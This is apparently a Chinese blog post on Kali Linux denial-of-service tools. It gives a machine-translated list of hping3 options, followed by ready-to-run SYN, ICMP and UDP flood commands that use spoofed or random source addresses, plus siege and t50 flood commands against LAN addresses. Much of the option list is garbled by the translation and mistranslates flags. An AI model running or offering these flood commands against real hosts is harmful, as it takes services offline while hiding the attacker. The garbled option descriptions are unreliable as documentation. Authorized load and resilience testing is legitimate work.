kali攻击139端口_kali linux之拒绝服务攻击工具

hping3

几乎可以定制发送任何TCP/IP数据包,用于测试FW,端口扫描,性能测试

-c - 计数包计数

-i - interval wait(uX表示X微秒,例如-i u1000)

- -i u10000的快速别名(第二个10个数据包)

- -i u1000的快速别名(第二个100个数据包)

--flood尽可能快地发送数据包。不要显示回复。

-n - 数字数字输出

-q - 安静

-I - 接口接口名称(否则为默认路由接口)

-V - verbose verbose模式

-D - 调试调试信息

-z - 绑定ctrl + z到ttl(默认为dst端口)

-Z - unbind unbind ctrl + z - 为收到的每个匹配数据包发出蜂鸣声

模式

默认模式TCP

-0 - RAIP RAW IP模式

-1 - icmp ICMP模式

-2 - 表示UDP模式

-8 - 扫描SCAN模式。示例:hping --scan 1-30,70-90 -S www.target.host

-9 - 听听模式

IP

-a - 欺骗欺骗源地址

--rand-dest随机destionation地址模式。看到那个男人。

--rand-source随机源地址模式。看到那个男人。

-t --ttl ttl(默认64)

-N - id id(默认随机)

-W --winid使用win * id字节排序

-r --rel相对化id字段(估计主机流量)

-f --frag分割更多碎片的数据包。 (可以通过弱acl)

-x --morefrag设置更多片段标志

-y --dontfrag set不分片标志

-g --fragoff设置片段偏移量

-m --mtu设置虚拟mtu,暗示--frag如果数据包大小> mtu

-o --tos服务类型(默认为0x00),尝试--tos帮助

-G --rroute包含RECORD_ROUTE选项并显示路由缓冲区

--lsrr松散的源路由和记录路由

--ssrr严格的源路由和记录路由

-H --ipproto仅在RAW IP模式下设置IP协议字段

ICMP

-C --icmptype icmp type(默认回显请求)

-K - icmpcode icmp code(默认为0)

--force-icmp发送所有icmp类型(默认发送仅支持的类型)

--icmp-gw设置ICMP重定向的网关地址(默认为0.0.0.0)

--icmp-ts别名为--icmp --icmptype 13(ICMP时间戳)

--icmp-addr别名为--icmp --icmptype 17(ICMP地址子网掩码)

--icmp-help显示其他icmp选项的帮助

UDP / TCP

-s --baseport基本源端口(默认随机)

-P --destport [+] [+] 目标端口(默认为0)ctrl + z inc / dec

-k - 保持静止源端口

-w --win winsize(默认64)

-O -​​-tcpoff设置假tcp数据偏移量(而不是tcphdrlen / 4)

-Q --seqnum仅显示tcp序列号

-b --badcksum(尝试)发送具有错误IP校验和的数据包

许多系统将修复发送数据包的IP校验和

所以你会得到错误的UDP / TCP校验和。

-M --setseq设置TCP序列号

-L --setack设置TCP确认

-F --fin设置FIN标志

-S --syn设置SYN标志

-R - 首先设置RST标志

-P --push设置PUSH标志

-A --ack设置ACK标志

-U - 设置URG标志

-X --xmas设置X未使用标志(0x40)

-Y --ymas设置Y未使用标志(0x80)

--tcpexitcode使用最后的tcp-> th_flags作为退出代码

--tcp-mss启用具有给定值的TCP MSS选项

--tcp-timestamp启用TCP时间戳选项以猜测HZ /正常运行时间

同项

-d - 数据数据大小(默认为0)

-E - 文件中的文件数据

-e --sign添加'签名'

-j --dump以十六进制转储数据包

-J --print转储可打印字符

-B --safe启用“安全”协议

-u --end告诉你--file何时达到EOF并防止倒带

-T --traceroute traceroute mode(暗示--bind和--ttl 1)

--tr-stop在traceroute模式下收到第一个非ICMP时退出

--tr-keep-ttl保持源TTL固定,仅用于监视一跳

--tr-no-rtt不要在traceroute模式下计算/显示RTT信息,ARS包描述(新的,不稳定的)

--apd-send发送APD描述的数据包

syn flood攻击

hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.12

hping3 -S -P -U -p 80 --flood --rand-source 192.168.1.12

hping3 -SARFUP -p 80 --flood --rand-source 192.168.1.12

icmp flood攻击

hping3 -q -n -a 192.168.1.12 --icmp -d 56 --flood 192.168.1.10

udp flood攻击

hping3 -a 192.168.1.12 --udp -s 53 -d 100 -p 53 --flood 192.168.1.10

Siege:http/https压力测试工具,模拟多个用户并发访问请求

siege -g http://192.168.1.12/xxsec.php / 192.168.1.12

T50

t50 192.168.1.12 --flood --turbo -S --protocol TCP --dport 80

t50 192.168.1.12 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22

友情链接 http://www.cnblogs.com/klionsec

http://www.cnblogs.com/l0cm

http://www.cnblogs.com/Anonyaptxxx

http://www.feiyusafe.cn

你可能感兴趣的:(kali攻击139端口)